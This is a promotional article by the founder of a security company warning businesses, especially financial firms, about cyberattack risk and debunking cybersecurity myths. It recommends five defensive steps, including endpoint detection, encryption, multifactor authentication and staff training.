All businesses are at risk for a cyberattack. In this time of economic insecurity we expect that the risk will increase. The past has shown a correlation between economic downturns and cybercrime. During and before the 2008 – 2009 Great Recession, fraud on the internet increased by 33% with the broken economy and increased digitization making data more vulnerable than ever.
Even though all organizations are at risk, some industries are more vulnerable than others. Among the most vulnerable are small businesses, healthcare, government agencies and their contractors, financial institutions, education, and energy and utility companies. Many of these organizations hold large volumes of personal, as well as financial data, while others control our infrastructure. They are a single access point to data from multiple organizations, which is incredibly valuable to cyber criminals.
These attacks come in many different forms and occur every 11 seconds. The top three leaders should worry about are ransomware, phishing attacks, and loss of sensitive data.
Cybersecurity Ventures, the world’s leading researcher and trusted source for cybersecurity facts, figures, and statistics, expects global cybercrime costs to reach $10.5 trillion USD annually by 2025, up from$3 trillion USD in 2015.
This represents the greatest transfer of economic wealth in history, risks the incentives for innovation and investment, is exponentially larger than the damage inflicted from natural disasters in a year, and will be more profitable than the global trade of all major illegal drugs combined.
Cybercrime costs include damage and destruction of data, stolen money, lost productivity, theft of intellectual property, theft of personal and financial data, embezzlement, fraud, post-attack disruption to the normal course of business, forensic investigation, restoration and deletion of hacked data and systems, and reputational harm.
Fortunately, by being vigilant about protection, 97 % of breaches can be prevented.
Understand the Myths
Many myths surround cybersecurity. Consider these:
- “You’re too small. Why would anyone want to target you?” That’s a myth. Most ransomware and other attacks are indiscriminate. They are carried out at volume and are completely scalable. The attackers blast hundreds of thousands of emails. They think in terms of conversion rate. They don’t know, nor do they care, who it is.
- Assuming you can’t afford enterprise-grade security – the same technical controls, administrative procedures or administrative controls, and other tactics, techniques, and procedures to protect your firm that the Department of Defense and Fortune 10 companies use. Cybersecurity is not expensive. An organization can invest only $20-30 a month per device. Compared to the average ransomware payouts of over $100,000, and victims who paid the criminals only recovered 65% of their data that is a small investment.
- Antivirus is good enough. The cold hard truth is that antivirus can only react. It works by checking files against a list of known viruses and comparing the two. If a virus is new and yet unknown, there is nothing to compare it to, and the user will be infected.
- “We’re covered because we have cybersecurity insurance.” Like all other insurance, this is the last thing you want to rely on to make your firm or your court whole. After a breach insurance is not going to make your reputation whole. In fact, 60% of small businesses that are victims of a cyber attack go out of business within six months.
- Cybersecurity is an IT issue. It’s not. It’s a security issue. IT and Infose care two different disciplines that require two different skillsets.
By understanding that these are myths and the cyberattack risk is real, financial firms can adequately protect themselves and clients from harm.
5 Steps to Cybersecurity
By taking these five steps financial firms can put in place a comprehensive ongoing cybersecurity program. Here are the steps:
- Realize that cybersecurity is not an IT issue. There is a difference between information security and IT. IT specialists ensure that networks are safe, and secure and running smoothly. A skilled team of information security specialists live and breathe cybersecurity 24/7. They keep up with the changing cyber threats. They reveal current risk and vulnerabilities and develop a plan to put security controls in place. Of course, they orchestrate the controls, tools, plans, policies, and procedures.
- Do not rely on antivirus. In today’s cyber environment it is ineffective. Antivirus looks for malicious code Malicious logs must already be known, so they typically are three to six months old and be whitelisted. Instead, enable an endpoint threat detection and response tool and eliminate antivirus. EDR monitors, analyzes and finds threats for malicious activity and anomalies in real time.
- Learn the importance of encryption. Disk encryption is built into most mobile devices and almost all iPads, and phones. This technology that protects information by changing it to unreadable code should be enabled for all devices.
- Multifactor authentication (MFA) is necessary. MFA is an authentication method that requires the user to provide two or more verification factors to gain access to a resource such as an application, online account, or a VPN. Rather than just asking for a username and password, MFA requires one or more additional verification factors, which decreases the likelihood of a successful cyber attack. MFA should be required for remote access to a desktop, server or any data. It is also good practice to use MFA wherever it is available – bank accounts, social media, e-commerce sites, to name a few.
- Create and foster a security-first environment from the top of the organization down. Employees are your first line of defense against a breach. Everyone who has access to any kind of computer or device on a network must have security awareness training. Continuously. No one is exempt.
A layered security approach with multiple best-of-breed tools and constant vigilance is the most effective line of defense.
Tying it all Together
Cyber risk is constantly evolving. In a technology-driven world, cyber risk is woven into the fabric of society. As the dependence on digital technologies in the business world increases, so does the scope of cyber risk. Cyber threat actors are active adversaries, constantly adapting their tactics, techniques, and procedures to cause harm.
Cyber risk can never be eliminated. Organizations will need to adopt new methods of understanding, measuring, and managing cyber risk on a continuous basis. A combination of cyber insurance and best-in-class cybersecurity practices can reduce this risk and provide some peace of mind for leaders.
About the Author
Tom Kirkham is Founder, CEO and CISO of Kirkham.IT and IronTech Security. Tom founded IronTech Security to focus on cybersecurity defense systems that protect and secure data for the financial, law, and water utility industries. IronTech focuses on educating and encouraging organizations to establish a security-first environment with cybersecurity training programs for all employees to prevent successful attacks. Tom brings more than three decades of software design, network administration, and cybersecurity knowledge to the table. During his career, Tom has received multiple software design awards and founded other acclaimed technology businesses. He is an active member of the FBI’s Arkansas InfraGard Chapter and frequently speaks about the latest in security threats. Tom’s new book: The Cyber Pandemic Survival Guide – Protecting Yourself from the Coming Worldwide Cyber Warwas published in July.
